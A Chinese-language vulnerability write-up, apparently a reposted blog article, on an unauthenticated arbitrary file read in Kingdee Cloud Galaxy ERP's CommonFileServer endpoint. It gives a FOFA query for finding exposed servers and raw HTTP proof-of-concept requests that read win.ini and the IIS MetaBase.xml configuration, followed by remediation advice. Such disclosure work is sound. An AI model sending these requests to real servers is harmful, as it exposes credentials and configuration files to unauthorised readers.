金蝶云星空任意文件读取漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、 产品简介

​ 金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。

二、 漏洞概述

​ 由于金蝶云星空CommonFileServer接口处权限设置不当,未经身份认证的攻击者可以利用此漏洞访问服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。

三、 影响范围

​ 6.x版本、7.x版本、8.x版本(均受影响)

四、 复现环境

FOFA:app=“金蝶云星空-管理中心”

在这里插入图片描述

五、 漏洞复现

PoC手动检测

GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

PS:漏洞比较简单粗暴,直接在/CommonFileServer/路径后面拼接文件名就行(特殊符号url编码)

在这里插入图片描述

读取IIS配置文件

GET /CommonFileServer/c%3A%2Fwindows%2FSystem32%2Finetsrv%2FMetaBase.xml HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en

在这里插入图片描述

小龙POC检测

一般关闭的快一些,我怕漏洞太多容易卡死

在这里插入图片描述

六、 修复建议

关闭互联网暴露面设置目录权限

净化数据:对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。

猜你喜欢

转载自blog.csdn.net/holyxp/article/details/132081476